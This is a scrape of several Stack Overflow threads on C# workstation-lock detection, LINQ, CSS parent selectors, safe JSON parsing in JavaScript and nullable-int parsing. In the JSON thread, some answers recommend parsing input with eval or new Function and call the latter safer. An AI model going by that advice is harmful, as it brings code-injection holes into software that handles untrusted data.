<package id="log4net" version="2.0.5" targetFramework="net45" />
<package id="Topshelf" version="4.0.3" targetFramework="net461" />
<package id="Topshelf.Log4Net" version="4.0.3" targetFramework="net461" />
A: I would create a Windows Service (a visual studio 2005 project type) that handles the OnSessionChange event as shown below:
protected override void OnSessionChange(SessionChangeDescription changeDescription)
{
if (changeDescription.Reason == SessionChangeReason.SessionLock)
{
//I left my desk
}
else if (changeDescription.Reason == SessionChangeReason.SessionUnlock)
{
//I returned to my desk
}
}
What and how you log the activity at that point is up to you, but a Windows Service provides quick and easy access to windows events like startup, shutdown, login/out, along with the lock and unlock events.
A: The solution below uses the Win32 API. OnSessionLock is called when the workstation is locked, and OnSessionUnlock is called when it is unlocked.
[DllImport("wtsapi32.dll")]
private static extern bool WTSRegisterSessionNotification(IntPtr hWnd,
int dwFlags);
[DllImport("wtsapi32.dll")]
private static extern bool WTSUnRegisterSessionNotification(IntPtr
hWnd);
private const int NotifyForThisSession = 0; // This session only
private const int SessionChangeMessage = 0x02B1;
private const int SessionLockParam = 0x7;
private const int SessionUnlockParam = 0x8;
protected override void WndProc(ref Message m)
{
// check for session change notifications
if (m.Msg == SessionChangeMessage)
{
if (m.WParam.ToInt32() == SessionLockParam)
OnSessionLock(); // Do something when locked
else if (m.WParam.ToInt32() == SessionUnlockParam)
OnSessionUnlock(); // Do something when unlocked
}
base.WndProc(ref m);
return;
}
void OnSessionLock()
{
Debug.WriteLine("Locked...");
}
void OnSessionUnlock()
{
Debug.WriteLine("Unlocked...");
}
private void Form1Load(object sender, EventArgs e)
{
WTSRegisterSessionNotification(this.Handle, NotifyForThisSession);
}
// and then when we are done, we should unregister for the notification
// WTSUnRegisterSessionNotification(this.Handle);
A: I hadn't found this before, but from any application you can hook up a SessionSwitchEventHandler. Obviously your application will need to be running, but so long as it is:
Microsoft.Win32.SystemEvents.SessionSwitch += new Microsoft.Win32.SessionSwitchEventHandler(SystemEvents_SessionSwitch);
void SystemEvents_SessionSwitch(object sender, Microsoft.Win32.SessionSwitchEventArgs e)
{
if (e.Reason == SessionSwitchReason.SessionLock)
{
//I left my desk
}
else if (e.Reason == SessionSwitchReason.SessionUnlock)
{
//I returned to my desk
}
}
A: In Windows Task Scheduler, you could create tasks that trigger on workstation lock and on workstation unlock. Each task could write a flag and timestamp to a file to state if the workstation is locked or unlocked and when it happened.
I realize that this is not a programmatic way. It is simpler than writing a service. It won't miss an event because your program happens to not be running at the time of lock/unlock transition.
A: Below is the 100% working code to find if the PC is locked or not.
Before using this, add a using directive for the System.Runtime.InteropServices namespace.
[DllImport("user32", EntryPoint = "OpenDesktopA", CharSet = CharSet.Ansi,SetLastError = true, ExactSpelling = true)]
private static extern Int32 OpenDesktop(string lpszDesktop, Int32 dwFlags, bool fInherit, Int32 dwDesiredAccess);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern Int32 CloseDesktop(Int32 hDesktop);
[DllImport("user32", CharSet = CharSet.Ansi,SetLastError = true,ExactSpelling = true)]
private static extern Int32 SwitchDesktop(Int32 hDesktop);
public static bool IsWorkstationLocked()
{
const int DESKTOP_SWITCHDESKTOP = 256;
int hwnd = -1;
int rtn = -1;
hwnd = OpenDesktop("Default", 0, false, DESKTOP_SWITCHDESKTOP);
if (hwnd != 0)
{
rtn = SwitchDesktop(hwnd);
if (rtn == 0)
{
// Locked
CloseDesktop(hwnd);
return true;
}
else
{
// Not locked
CloseDesktop(hwnd);
}
}
else
{
// Error: "Could not access the desktop..."
}
return false;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44980",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "114"
} |
Q: How do you index into a var in LINQ? I'm trying to get the following bit of code to work in LINQPad but am unable to index into a var. Anybody know how to index into a var in LINQ?
string[] sa = {"one", "two", "three"};
sa[1].Dump();
var va = sa.Select( (a,i) => new {Line = a, Index = i});
va[1].Dump();
// Cannot apply indexing with [] to an expression of type 'System.Collections.Generic.IEnumerable<AnonymousType#1>'
A: You can't apply an index to a var unless it's an indexable type:
//works because under the hood the C# compiler has converted var to string[]
var arrayVar = new[] { "one", "two", "three" };
arrayVar[1].Dump();
//now let's try
var selectVar = arrayVar.Select( (a,i) => new { Line = a });
//or this (I find this syntax easier, but either works)
var selectVar =
from s in arrayVar
select new { Line = s };
In both these cases selectVar is actually IEnumerable<'a> - not an indexed type. You can easily convert it to one though:
//convert it to a List<'a>
var aList = selectVar.ToList();
//convert it to a 'a[]
var anArray = selectVar.ToArray();
//or even a Dictionary<string,'a>
var aDictionary = selectVar.ToDictionary( x => x.Line );
A: As the comment says, you cannot apply indexing with [] to an expression of type System.Collections.Generic.IEnumerable<T>. The IEnumerable interface only supports the method GetEnumerator(). However with LINQ you can call the extension method ElementAt(int).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44989",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: reassign value to query string parameter I have a "showall" query string parameter in the url, the parameter is being added dynamically when "Show All/Show Pages" button is clicked.
I want the ability to toggle "showall" query string parameter value depending on user clicking the "Show All/Show Pages" button.
I'm doing some nested "if's" and string.Replace() on the url, is there a better way?
All manipulations are done on the server.
p.s. Toran, good suggestion, however I HAVE TO USE URL PARAMETER due to some other issues.
A: Just to elaborate on Toran's answer:
Use:
<asp:HiddenField ID="ShowAll" Value="False" runat="server" />
To toggle your state:
protected void ToggleState(object sender, EventArgs e)
{
//parse string as boolean, invert, and convert back to string
ShowAll.Value = (!Boolean.Parse(ShowAll.Value)).ToString();
}
A: Another dirty alternative could be just to use a hidden input and set that on/off instead of manipulating the url.
A: Would it be too much of an effort just to have the value hard-coded into the URL (I know it's not too nice) with a default value of true, and then just have
booleanVar = !booleanVar;
run on every page load?
At least that would move away from the need of having nested ifs to manipulate the URL.
A: I am not sure based upon the question, but isn't this where HTTPHandlers come to the rescue? Shouldn't you be handling the variable alteration on the object prior to page rendering in this case then?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44999",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: In Lucene how do terms get used in calculating scores, can I override it with a CustomScoreQuery? Has someone successfully overridden the scoring of documents in a query so that the "relevancy" of a term to the field contents can be determined through one's own function? If so, was it by implementing a CustomScoreQuery and overriding the customScore(int, float, float)? I cannot seem to find a way to build either a custom sort or a custom scorer that can rank exact term matches much higher than other prefix term matches. Any suggestions would be appreciated.
A: I don't know lucene directly, but I can tell you that Solr, an application based on lucene, has got this feature:
Boosting query via functions
Let me know if it helps you.
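If you are on plain Lucene rather than Solr, a common alternative to overriding CustomScoreQuery is to combine a boosted exact TermQuery with a PrefixQuery inside a BooleanQuery. A minimal sketch using the classic (pre-4.x) Lucene API; the field and term values are placeholders:
BooleanQuery query = new BooleanQuery();
TermQuery exact = new TermQuery(new Term("title", "foo"));
exact.setBoost(10.0f); // exact matches score much higher than prefix matches
query.add(exact, BooleanClause.Occur.SHOULD);
query.add(new PrefixQuery(new Term("title", "foo")), BooleanClause.Occur.SHOULD);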
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45002",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Complex CSS selector for parent of active child Is there a way to select a parent element based on the class of a child element in the class? The example that is relevant to me relating to HTML output by a nice menu plugin for http://drupal.org. The output renders like this:
<ul class="menu">
<li>
<a class="active">Active Page</a>
</li>
<li>
<a>Some Other Page</a>
</li>
</ul>
My question is whether or not it is possible to apply a style to the list item that contains the anchor with the active class on it. Obviously, I'd prefer that the list item be marked as active, but I don't have control of the code that gets produced. I could perform this sort of thing using javascript (JQuery springs to mind), but I was wondering if there is a way to do this using CSS selectors.
Just to be clear, I want to apply a style to the list item, not the anchor.
A: Late to the party again but for what it's worth it is possible using jQuery to be a little more succinct. In my case I needed to find the <ul> parent tag for a <span> tag contained in the child <li>. jQuery has the :has selector so it's possible to identify a parent by the children it contains (updated per @Afrowave's comment ref: https://api.jquery.com/has-selector/):
$("ul").has("#someId")
will select the ul element that has a child element with id someId. Or to answer the original question, something like the following should do the trick (untested):
$("li").has(".active")
A: THE “PARENT” SELECTOR
Right now, there is no option to select the parent of an element in CSS (not even CSS3). But with CSS4, the most important news in the current W3C draft is the support for the parent selector.
$ul li:hover{
background: #fff;
}
Using the above, when hovering an list element, the whole unordered list will be highlighted by adding a white background to it.
Official documentation: https://www.w3.org/TR/2011/WD-selectors4-20110929/#overview (last row).
A: According to Wikipedia:
Selectors are unable to ascend
CSS offers no way to select a parent or ancestor of an element that satisfies certain criteria. A more advanced selector scheme (such as XPath) would enable more sophisticated stylesheets. However, the major reasons for the CSS Working Group rejecting proposals for parent selectors are related to browser performance and incremental rendering issues.
And for anyone searching SO in future, this might also be referred to as an ancestor selector.
Update:
The Selectors Level 4 Spec allows you to select which part of the select is the subject:
The subject of the selector can be explicitly identified by prepending
a dollar sign ($) to one of the compound selectors in a selector.
Although the element structure that the selector represents is the
same with or without the dollar sign, indicating the subject in this
way can change which compound selector represents the subject in that
structure.
Example 1:
For example, the following selector represents a list item LI unique child of
an ordered list OL:
OL > LI:only-child
However the following one represents an ordered list OL having a unique child,
that child being a LI:
$OL > LI:only-child
The structures represented by these two selectors are the same,
but the subjects of the selectors are not.
Although this isn't available (currently, November 2011) in any browser or as a selector in jQuery.
A: I had the same problem with Drupal. Given the limitations of CSS, the way to get this working is to add the "active" class to the parent elements when the menu HTML is generated. There's a good discussion of this at http://drupal.org/node/219804, the upshot of which is that this functionality has been rolled in to version 6.x-2.x of the nicemenus module. As this is still in development, I've backported the patch to 6.x-1.3 at http://drupal.org/node/465738 so that I can continue to use the production-ready version of the module.
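If you can't patch the module, a one-line jQuery fallback (assuming jQuery is already on the page) achieves the same effect client-side:
// Mark the <li> containing the active link so plain CSS can style it
$('ul.menu a.active').parent('li').addClass('active');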
A: I actually ran into the same issue as the original poster. There is a simple solution of just using .parent() jQuery selector. My problem was, I was using .parent instead of .parent(). Stupid mistake I know.
Bind the events (in this case, since my tabs are in a modal, I needed to bind them with .live instead of a basic .click).
$('#testTab1 .tabLink').live('click', function() {
$('#modal ul.tabs li').removeClass("current"); //Remove any "current" class
$(this).parent().addClass("current"); //Add "current" class to selected tab
$('#modal div#testTab1 .tabContent').hide();
$(this).next('.tabContent').fadeIn();
return false;
})
$('#testTab2 .tabLink').live('click', function() {
$('#modal ul.tabs li').removeClass("current"); //Remove any "current" class
$(this).parent().addClass("current"); //Add "current" class to selected tab
$('#modal div#testTab2 .tabContent').hide();
$(this).next('.tabContent').fadeIn();
return false;
})
Here is the HTML..
<div id="tabView1" style="display:none;">
<!-- start: the code for tabView 1 -->
<div id="testTab1" style="width:1080px; height:640px; position:relative;">
<h1 class="Bold_Gray_45px">Modal Header</h1>
<div class="tabBleed"></div>
<ul class="tabs">
<li class="current"> <a href="#" class="tabLink" id="link1">Tab Title Link</a>
<div class="tabContent" id="tabContent1-1">
<div class="modalCol">
<p>Your Tab Content</p>
<p><a href="#" class="tabShopLink">tabBased Anchor Link</a> </p>
</div>
<div class="tabsImg"> </div>
</div>
</li>
<li> <a href="#" class="tabLink" id="link2">Tab Title Link</a>
<div class="tabContent" id="tabContent1-2">
<div class="modalCol">
<p>Your Tab Content</p>
<p><a href="#" class="tabShopLink">tabBased Anchor Link</a> </p>
</div>
<div class="tabsImg"> </div>
</div>
</li>
</ul>
</div>
</div>
Of course you can repeat that pattern..with more LI's
A: Many people answered with jQuery parent, but just to add on to that I wanted to share a quick snippet of code that I use for adding classes to my navs so I can add styling to li's that only have sub-menus and not li's that don't.
$("li ul").parent().addClass('has-sub');
A: You can use :has() (in browsers that support it):
li:has(a.active) {
    /* ... */
}
Without :has() support, unfortunately, there's no way to do that with CSS.
It's not very difficult with JavaScript though:
// JavaScript code:
document.getElementsByClassName("active")[0].parentNode;
// jQuery code:
$('.active').parent().get(0); // This would be the <a>'s parent <li>.
A: The first draft of Selectors Level 4 outlines a way to explicitly set the subject of a selector. This would allow the OP to style the list element with the selector $li > a.active
From Determining the Subject of a Selector:
For example, the following selector represents a list item LI unique child of an ordered list OL:
OL > LI:only-child
However the following one represents an ordered list OL having a unique child, that child being a LI:
$OL > LI:only-child
The structures represented by these two selectors are the same, but the subjects of the selectors are not.
Edit: Given how "drafty" a draft spec can be, it's best to keep tabs on this by checking the CSSWG's page on selectors level 4.
A: Future answer with CSS4 selectors
New CSS Specs contain an experimental :has pseudo selector that might be able to do this thing.
li:has(a.active) {
/* ... */
}
The browser support on this is basically non-existent at this time, but it is in consideration on the official specs.
Answer in 2012 that was wrong in 2012 and is even more wrong in 2018
While it is true that CSS cannot ASCEND, it is incorrect that you cannot grab the parent element of another element. Let me reiterate:
Using your HTML example code, you are able to grab the li without specifying li
ul * a {
property:value;
}
In this example, the ul is the parent of some element and that element is the parent of anchor. The downside of using this method is that if there is a ul with any child element that contains an anchor, it inherits the styles specified.
You may also use the child selector as well since you'll have to specify the parent element anyway.
ul>li a {
property:value;
}
In this example, the anchor must be a descendant of an li that MUST be a child of ul, meaning it must be within the tree following the ul declaration. This is going to be a bit more specific and will only grab a list item that contains an anchor AND is a child of ul.
SO, to answer your question by code.
ul.menu > li a.active {
property:value;
}
This should grab the ul with the class of menu, and the child list item that contains only an anchor with the class of active.
A: Another thought occurred to me just now that could be a pure CSS solution. Display your active class as an absolutely positioned block and set its style to cover up the parent li.
a.active {
position:absolute;
display:block;
width:100%;
height:100%;
top:0em;
left:0em;
background-color: whatever;
border: whatever;
}
/* will also need to make sure the parent li is a positioned element so... */
ul.menu li {
position:relative;
}
For those of you who want to use javascript without jquery...
Selecting the parent is trivial. You need a getElementsByClass function of some sort, unless you can get your drupal plugin to assign the active item an ID instead of Class. The function I provided I grabbed from some other genius on SO. It works well, just keep in mind when you're debugging that the function will always return an array of nodes, not just a single node.
var active_li = getElementsByClass(document, "active", "a");
active_li[0].parentNode.style.whatever="whatever";
function getElementsByClass(node,searchClass,tag) {
var classElements = new Array();
var els = node.getElementsByTagName(tag); // use "*" for all elements
var elsLen = els.length;
var pattern = new RegExp("\\b"+searchClass+"\\b");
for (var i = 0, j = 0; i < elsLen; i++) {
if ( pattern.test(els[i].className) ) {
classElements[j] = els[i];
j++;
}
}
return classElements;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "367"
} |
Q: Can the HTTP version or headers affect the visual appearance of a web page? I know, I would have thought the answer was obviously "no" as well, but I am experiencing a strange situation where when I view my site from our staging server it appears slightly larger than when I view it from my local dev server. I have used Charles to confirm that all of the content -- the HTML, the images, the CSS, the javascript, everything is the same.
The ONLY difference in the traffic is that (because the local site is served from the Django development mode server) the response headers look like this:
HTTP/1.0 200 OK
Server WSGIServer/0.1 Python/2.5.2
Date Thu, 04 Sep 2008 23:56:10 GMT
Vary Cookie
Content-Length 2301
Content-Type text/html; charset=utf-8
Whereas on the staging server (where Django is running inside Apache) the headers look like this:
HTTP/1.1 200 OK
Date Thu, 04 Sep 2008 23:56:06 GMT
Server Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5 with Suhosin-Patch
Vary Cookie
Content-Length 2301
Content-Type text/html; charset=utf-8
So, as far as I can tell the only differences are HTTP/1.1 vs HTTP/1.0, the server identifer (Apache vs WSGIServer) and the order of the Date/Server headers.
To elaborate a bit further on the differences in appearance, basically it appears as if the version of the site on the staging server is "zoomed in" by about 10%. For example, the primary logo which dominates our home page is 220 pixels wide but when server from our staging server shows up as 245 pixels wide. Everything else on the page, (other images, text, spacing, etc) is also proportionately larger.
This is all in Firefox 3. I don't have any other browsers available to test with at the moment.
Has anyone else encountered any bizarre behavior anything like this before? I am at a loss.
A: Have you tried View -> Zoom -> Reset on both sites?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45013",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Safely turning a JSON string into an object Given a string of JSON data, how can I safely turn that string into a JavaScript object?
Obviously I can do this unsafely with something like:
var obj = eval("(" + json + ')');
but that leaves me vulnerable to the JSON string containing other code, which it seems very dangerous to simply eval.
A: The jQuery method is now deprecated. Use this method instead:
let jsonObject = JSON.parse(jsonString);
Original answer using deprecated jQuery functionality:
If you're using jQuery just use:
jQuery.parseJSON( jsonString );
It's exactly what you're looking for (see the jQuery documentation).
A: Use the simple code example in "JSON.parse()":
var jsontext = '{"firstname":"Jesper","surname":"Aaberg","phone":["555-0100","555-0120"]}';
var contact = JSON.parse(jsontext);
and reversing it:
var str = JSON.stringify(arr);
A: I found a "better" way:
In CoffeeScript:
try data = JSON.parse(jqxhr.responseText)
data ||= { message: 'Server error, please retry' }
In Javascript:
var data;
try {
data = JSON.parse(jqxhr.responseText);
} catch (_error) {}
data || (data = {
message: 'Server error, please retry'
});
A: JSON parsing is always a pain. If the input is not as expected it throws an error and crashes what you are doing.
You can use the following tiny function to safely parse your input. It always returns an object, even if the input is not valid or is already an object, which is better for most cases:
JSON.safeParse = function (input, def) {
// Convert null to empty object
if (!input) {
return def || {};
} else if (Object.prototype.toString.call(input) === '[object Object]') {
return input;
}
try {
return JSON.parse(input);
} catch (e) {
return def || {};
}
};
A: Parse the JSON string with JSON.parse(), and the data becomes a JavaScript object:
JSON.parse(jsonString)
Here, JSON is the built-in object used to process the JSON dataset.
Imagine we received this text from a web server:
'{ "name":"John", "age":30, "city":"New York"}'
To parse into a JSON object:
var obj = JSON.parse('{ "name":"John", "age":30, "city":"New York"}');
Here obj is the respective JSON object which looks like:
{ "name":"John", "age":30, "city":"New York"}
To fetch a value use the . operator:
obj.name // John
obj.age //30
Convert a JavaScript object into a string with JSON.stringify().
A: JSON.parse() converts any JSON string passed into the function into a JSON object.
To understand it better, press F12 to open "Inspect Element" in your browser and go to the console to write the following commands:
var response = '{"result":true,"count":1}'; //sample json object(string form)
JSON.parse(response); //converts passed string to JSON Object.
Now run the command:
console.log(JSON.parse(response));
You'll get output as an Object {result: true, count: 1}.
In order to use that Object, you can assign it to the variable, maybe obj:
var obj = JSON.parse(response);
By using obj and the dot (.) operator you can access properties of the JSON object.
Try to run the command:
console.log(obj.result);
A: JSON.parse(jsonString);
JSON.parse will convert the string into an object.
A: Official documentation:
The JSON.parse() method parses a JSON string, constructing the JavaScript value or object described by the string. An optional reviver function can be provided to perform a transformation on the resulting object before it is returned.
Syntax:
JSON.parse(text[, reviver])
Parameters:
text
: The string to parse as JSON. See the JSON object for a description of JSON syntax.
reviver (optional)
: If a function, this prescribes how the value originally produced by parsing is transformed, before being returned.
Return value
The Object corresponding to the given JSON text.
Exceptions
Throws a SyntaxError exception if the string to parse is not valid JSON.
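For example, a minimal reviver that doubles every numeric value while parsing:
const result = JSON.parse('{"p": 5}', (key, value) =>
    typeof value === 'number' ? value * 2 : value
);
console.log(result.p); // 10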
A: If we have a string like this:
"{\"status\":1,\"token\":\"65b4352b2dfc4957a09add0ce5714059\"}"
then we can simply use JSON.parse twice to convert this string to a JSON object:
var sampleString = "{\"status\":1,\"token\":\"65b4352b2dfc4957a09add0ce5714059\"}"
var jsonString= JSON.parse(sampleString)
var jsonObject= JSON.parse(jsonString)
And we can extract values from the JSON object using:
// instead of last JSON.parse:
var { status, token } = JSON.parse(jsonString);
The result will be:
status = 1 and token = 65b4352b2dfc4957a09add0ce5714059
A: Performance
There are already good answers for this question, but I was curious about performance, and today 2020.09.21 I conducted tests on macOS High Sierra 10.13.6 on Chrome v85, Safari v13.1.2 and Firefox v80 for the chosen solutions.
Results
*
*eval/Function (A,B,C) approaches are fast on Chrome (but for the big-deep object N=1000 they crash with "Maximum call stack size exceeded")
*eval (A) is fast/medium fast on all browsers
*JSON.parse (D,E) are fastest on Safari and Firefox
Details
I perform 4 tests cases:
*
*for small shallow object HERE
*for small deep object HERE
*for big shallow object HERE
*for big deep object HERE
Object used in above tests came from HERE
let obj_ShallowSmall = {
field0: false,
field1: true,
field2: 1,
field3: 0,
field4: null,
field5: [],
field6: {},
field7: "text7",
field8: "text8",
}
let obj_DeepSmall = {
level0: {
level1: {
level2: {
level3: {
level4: {
level5: {
level6: {
level7: {
level8: {
level9: [[[[[[[[[['abc']]]]]]]]]],
}}}}}}}}},
};
let obj_ShallowBig = Array(1000).fill(0).reduce((a,c,i) => (a['field'+i]=getField(i),a) ,{});
let obj_DeepBig = genDeepObject(1000);
// ------------------
// Show objects
// ------------------
console.log('obj_ShallowSmall:',JSON.stringify(obj_ShallowSmall));
console.log('obj_DeepSmall:',JSON.stringify(obj_DeepSmall));
console.log('obj_ShallowBig:',JSON.stringify(obj_ShallowBig));
console.log('obj_DeepBig:',JSON.stringify(obj_DeepBig));
// ------------------
// HELPERS
// ------------------
function getField(k) {
let i=k%10;
if(i==0) return false;
if(i==1) return true;
if(i==2) return k;
if(i==3) return 0;
if(i==4) return null;
if(i==5) return [];
if(i==6) return {};
if(i>=7) return "text"+k;
}
function genDeepObject(N) {
// generate: {level0:{level1:{...levelN: {end:[[[...N-times...['abc']...]]] }}}...}}}
let obj={};
let o=obj;
let arr = [];
let a=arr;
for(let i=0; i<N; i++) {
o['level'+i]={};
o=o['level'+i];
let aa=[];
a.push(aa);
a=aa;
}
a[0]='abc';
o['end']=arr;
return obj;
}
Below snippet presents chosen solutions
// src: https://stackoverflow.com/q/45015/860099
function A(json) {
return eval("(" + json + ')');
}
// https://stackoverflow.com/a/26377600/860099
function B(json) {
return (new Function('return ('+json+')'))()
}
// improved https://stackoverflow.com/a/26377600/860099
function C(json) {
return Function('return ('+json+')')()
}
// src: https://stackoverflow.com/a/5686237/860099
function D(json) {
return JSON.parse(json);
}
// src: https://stackoverflow.com/a/233630/860099
function E(json) {
return $.parseJSON(json)
}
// --------------------
// TEST
// --------------------
let json = '{"a":"abc","b":"123","d":[1,2,3],"e":{"a":1,"b":2,"c":3}}';
[A,B,C,D,E].map(f=> {
console.log(
f.name + ' ' + JSON.stringify(f(json))
)})
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
This snippet only presents the functions used in the performance tests - it does not perform the tests itself!
And here are example results for chrome
A: This seems to be the issue:
Input received via Ajax, websockets, etc. will be in string format, but you need to know whether it is JSON-parsable. The trouble is that if you always run it through JSON.parse, the program MAY continue "successfully", but you'll still see an error thrown in the console with the dreaded "Error: unexpected token 'x'".
var data;
try {
data = JSON.parse(jqxhr.responseText);
} catch (_error) {}
data || (data = {
message: 'Server error, please retry'
});
A: I'm not sure about other ways to do it but here's how you do it in Prototype (JSON tutorial).
new Ajax.Request('/some_url', {
method:'get',
requestHeaders: {Accept: 'application/json'},
onSuccess: function(transport){
var json = transport.responseText.evalJSON(true);
}
});
Calling evalJSON() with true as the argument sanitizes the incoming string.
A: JSON.parse(jsonString) is a pure JavaScript approach so long as you can guarantee a reasonably modern browser.
A: If you're using jQuery, you can also use:
$.getJSON(url, function(data) { });
Then you can do things like
data.key1.something
data.key1.something_else
etc.
A: Converting the object to JSON, and then parsing it, works for me, like:
JSON.parse(JSON.stringify(object))
A: The recommended approach to parse JSON in JavaScript is to use JSON.parse()
Background
The JSON API was introduced with ECMAScript 5 and has since been implemented in >99% of browsers by market share.
jQuery once had a $.parseJSON() function, but it was deprecated with jQuery 3.0. In any case, for a long time, it was nothing more than a wrapper around JSON.parse().
Example
const json = '{ "city": "Boston", "population": 500000 }';
const object = JSON.parse(json);
console.log(object.city, object.population);
Browser Compatibility
Is JSON.parse supported by all major browsers?
Pretty much, yes (see reference).
A: Just for fun, here is a way using a function:
jsonObject = (new Function('return ' + jsonFormatData))()
A: $.ajax({
url: url,
dataType: 'json',
data: data,
success: callback
});
The callback is passed the returned data, which will be a JavaScript object or array as defined by the JSON structure and parsed using the $.parseJSON() method.
A: This answer is for IE < 7, for modern browsers check Jonathan's answer above.
This answer is outdated and Jonathan's answer above (JSON.parse(jsonString)) is now the best answer.
JSON.org has JSON parsers for many languages including four different ones for JavaScript. I believe most people would consider json2.js their goto implementation.
A: Using JSON.parse is probably the best way.
Here's an example
var jsonRes = '{ "students" : [' +
'{ "firstName":"Michel" , "lastName":"John" ,"age":18},' +
'{ "firstName":"Richard" , "lastName":"Joe","age":20 },' +
'{ "firstName":"James" , "lastName":"Henry","age":15 } ]}';
var studentObject = JSON.parse(jsonRes);
A: Try using this method with a Data string such as Data = '{result:true,count:1}':
try {
eval('var obj=' + Data);
console.log(obj.count);
}
catch(e) {
console.log(e.message);
}
This method really helps in Node.js when you are working with serial port programming.
A: The easiest way is using the parse() method:
var response = '{"result":true,"count":1}';
var JsonObject= JSON.parse(response);
Then you can get the values of the JSON elements, for example:
var myResponseResult = JsonObject.result;
var myResponseCount = JsonObject.count;
Using jQuery as described in the jQuery.parseJSON() documentation:
JSON.parse(jsonString);
A: You can also use a reviver function to filter:
var data = JSON.parse(jsonString, function reviver(key, value) {
//your code here to filter
});
For more information read JSON.parse.
A: Older question, I know, however nobody noticed this solution using new Function(), an anonymous function that returns the data.
Just an example:
var oData = 'test1:"This is my object",test2:"This is my object"';
if( typeof oData !== 'object' )
try {
oData = (new Function('return {'+oData+'};'))();
}
catch(e) { oData=false; }
if( typeof oData !== 'object' )
{ alert( 'Error in code' ); }
else {
alert( oData.test1 );
alert( oData.test2 );
}
This is a little safer because it executes inside a function and does not compile into your code directly. So if there is a function declaration inside it, it will not be bound to the default window object.
I use this to 'compile' configuration settings of DOM elements (for example the data attribute) simply and quickly.
A: Summary:
JavaScript (both browser and Node.js) has a built-in JSON object. On this object are 2 convenient methods for dealing with JSON. They are the following:
*
*JSON.parse() Takes a JSON string as argument, returns a JS object
*JSON.stringify() Takes a JS object as argument, returns a JSON string
Other applications:
Besides conveniently dealing with JSON, they can be used for other purposes. The combination of both JSON methods makes it very easy to create deep clones of arrays or objects. For example:
let arr1 = [1, 2, [3 ,4]];
let newArr = arr1.slice();
arr1[2][0] = 'changed';
console.log(newArr); // not a deep clone
let arr2 = [1, 2, [3 ,4]];
let newArrDeepclone = JSON.parse(JSON.stringify(arr2));
arr2[2][0] = 'changed';
console.log(newArrDeepclone); // A deep clone, values unchanged
A: Just to cover parsing for different input types
Parse the data with JSON.parse(), and the data becomes a JavaScript object.
var obj = JSON.parse('{ "name":"John", "age":30, "city":"New York"}');
When using JSON.parse() on JSON derived from an array, the method will return a JavaScript array instead of a JavaScript object.
var myArr = JSON.parse(this.responseText);
console.log(myArr[0]);
Date objects are not allowed in JSON.
For dates, do something like this:
var text = '{ "name":"John", "birth":"1986-12-14", "city":"New York"}';
var obj = JSON.parse(text);
obj.birth = new Date(obj.birth);
Functions are not allowed in JSON.
If you need to include a function, write it as a string.
var text = '{ "name":"John", "age":"function () {return 30;}", "city":"New York"}';
var obj = JSON.parse(text);
obj.age = eval("(" + obj.age + ")");
A: Another option
const json = '{ "fruit": "pineapple", "fingers": 10 }'
let j0s,j1s,j2s,j3s
console.log(`{ "${j0s="fruit"}": "${j1s="pineapple"}", "${j2s="fingers"}": ${j3s="10"} }`)
A: Try this. This one is written in TypeScript.
export function safeJsonParse(str: string) {
try {
return JSON.parse(str);
} catch (e) {
return str;
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45015",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1475"
} |
Q: How to parse a string into a nullable int I'm wanting to parse a string into a nullable int in C#. ie. I want to get back either the int value of the string or null if it can't be parsed.
I was kind of hoping that this would work
int? val = stringVal as int?;
But that won't work, so the way I'm doing it now is I've written this extension method
public static int? ParseNullableInt(this string value)
{
if (value == null || value.Trim() == string.Empty)
{
return null;
}
else
{
try
{
return int.Parse(value);
}
catch
{
return null;
}
}
}
Is there a better way of doing this?
EDIT: Thanks for the TryParse suggestions, I did know about that, but it worked out about the same. I'm more interested in knowing if there is a built-in framework method that will parse directly into a nullable int?
A: I feel my solution is a very clean and nice solution:
public static T? NullableParse<T>(string s) where T : struct
{
try
{
return (T)typeof(T).GetMethod("Parse", new[] {typeof(string)}).Invoke(null, new[] { s });
}
catch (Exception)
{
return null;
}
}
This is of course a generic solution which only requires that the generic argument has a static method "Parse(string)". This works for numbers, booleans, DateTime, etc.
A: You can forget all other answers - there is a great generic solution:
http://cleansharp.de/wordpress/2011/05/generischer-typeconverter/
This allows you to write very clean code like this:
string value = null;
int? x = value.ConvertOrDefault();
and also:
object obj = 1;
string value = null;
int x = 5;
if (value.TryConvert(out x))
Console.WriteLine("TryConvert example: " + x);
bool boolean = "false".ConvertOrDefault();
bool? nullableBoolean = "".ConvertOrDefault();
int integer = obj.ConvertOrDefault();
int negativeInteger = "-12123".ConvertOrDefault();
int? nullableInteger = value.ConvertOrDefault();
MyEnum enumValue = "SecondValue".ConvertOrDefault();
MyObjectBase myObject = new MyObjectClassA();
MyObjectClassA myObjectClassA = myObject.ConvertOrDefault();
A: I would suggest the following extension methods for parsing a string into an int value, with the ability to define a default value in case parsing is not possible:
public static int ParseInt(this string value, int defaultIntValue = 0)
{
return int.TryParse(value, out var parsedInt) ? parsedInt : defaultIntValue;
}
public static int? ParseNullableInt(this string value)
{
if (string.IsNullOrEmpty(value))
return null;
return value.ParseInt();
}
A: int.TryParse is probably a tad easier:
public static int? ToNullableInt(this string s)
{
int i;
if (int.TryParse(s, out i)) return i;
return null;
}
Edit @Glenn int.TryParse is "built into the framework". It and int.Parse are the way to parse strings to ints.
A: [Updated to use modern C# as per @sblom's suggestion]
I had this problem and I ended up with this (after all, an if and 2 returns is soo long-winded!):
int? ToNullableInt (string val)
=> int.TryParse (val, out var i) ? (int?) i : null;
